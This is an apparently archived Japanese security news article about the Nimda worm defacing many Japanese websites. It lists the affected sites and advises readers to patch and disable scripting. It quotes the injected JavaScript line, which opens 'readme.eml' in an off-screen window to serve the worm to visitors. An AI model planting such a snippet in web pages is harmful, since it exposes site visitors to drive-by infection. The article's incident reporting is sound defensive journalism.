msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる | ScanNetSecurity
2024.05.01(水)

msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる

 Nimda によるweb改竄は、急激に広がっている。
 現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスす

インシデント・事故 インシデント・情報漏えい
facebookLINE
 Nimda によるweb改竄は、急激に広がっている。
 現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスすると、被害を受けることになる。インターネット利用にあたっては、パッチをあてる、スクリプトをオフにするなどの自己防衛が不可欠となっている。

改竄されたページには、下記のスクリプトが埋め込まれている。
  「<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>」

 感染したwebは、拡大しており、下記にあげるものは、ごく一部でしかない。

改竄され、踏み台となったweb
 ・msnトップページ
  http://www.msn.co.jp/
 ・オリコ
  http://www.orico.co.jp/
 ・オリコ
  http://www.orico.co.jp/senden/cm/e1.html
 ・山梨学院大学
  http://www.ygu.ac.jp/
 ・山梨学院大学法学部
  http://www.ygu.ac.jp/guide/hougakuseiji/index.html
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
 ・株式会社マウント富士インターネット
  http://www.mfi.or.jp/www/
 ・都留信用組合
  http://www.mfi.or.jp/w3/home0/tsurusin/
 ・RESORTHOTEL CAMELOT
  http://www.mfi.or.jp/camelot/main.htm
 ・株式会社ストローカー ジャパン
  http://www.mfi.or.jp/sjc/
 ・日本囲碁ソフト
  布石・定石パワー アップデートモジュールのダウンロード
  http://www.igosoft.co.jp/html/update/jpow2up.html
 ・囲碁ソフト 次の一手
  http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
 ・株式会社エルミックシステム
  http://www.elmic.co.jp/japanese/index.html
 ・株式会社タイリクトラベル
  http://www.tairiku.co.jp/hotel/
 ・株式会社タイリクトラベル TE ANAU テアナウ ホテル料金一覧
  http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
 ・JTB GLOBAL ASSISTANCE
  http://www.jga.co.jp/Indexright.htm
 ・マックスバリュ東北株式会社
  http://www.mv-tohoku.co.jp/
 ・株式会社 日東物産
  http://www.prland.co.jp/
 ・株式会社 日本ユニオンシステム
  http://www.unionsys.co.jp/
 ・代官山美容外科
  http://www.mpint.co.jp/~dky/congress_J.htm
 ・RSoundLibrary
  http://www.crypton.co.jp/Web98/html/10380.html
 ・東京工業大学 井口家成 研究室HP内の個人ページ
  http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
 ・志學館学園
  http://www.jkajyo.ac.jp/
 ・志學館学園
  http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
 ・キャリアプラザ名古屋支店
  http://www.hito-plaza.com/MM/news010914.htm
 ・早稲田大学 嘉納研究室
  http://www.kano.arch.waseda.ac.jp/

《ScanNetSecurity》

PageTop

アクセスランキング

  1. 今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

    今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

  2. 雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

    雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

  3. GROWI に複数の脆弱性

    GROWI に複数の脆弱性

  4. クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

    クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

  5. 2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

    2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

  6. セトレならまちで利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

    セトレならまちで利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

  7. KELA、生成 AI セキュリティソリューション「AiFort」提供開始

    KELA、生成 AI セキュリティソリューション「AiFort」提供開始

  8. インターネット専用宝くじで当選本数の登録誤り、1 等 200 万円 10 本が 200 本に

    インターネット専用宝くじで当選本数の登録誤り、1 等 200 万円 10 本が 200 本に

  9. 社員のセキュリティ意欲高める施策とは? 罰則は逆効果 ~ プルーフポイント「2024 State of the Phish」日本語版公表

    社員のセキュリティ意欲高める施策とは? 罰則は逆効果 ~ プルーフポイント「2024 State of the Phish」日本語版公表

  10. メール誤送信事故多発で悪名高いドッペルゲンガードメイン「gmai.com」はどこの誰が保有しているのか?

    メール誤送信事故多発で悪名高いドッペルゲンガードメイン「gmai.com」はどこの誰が保有しているのか?

ランキングをもっと見る
ホーム インシデント・事故 インシデント・情報漏えい 記事
TOP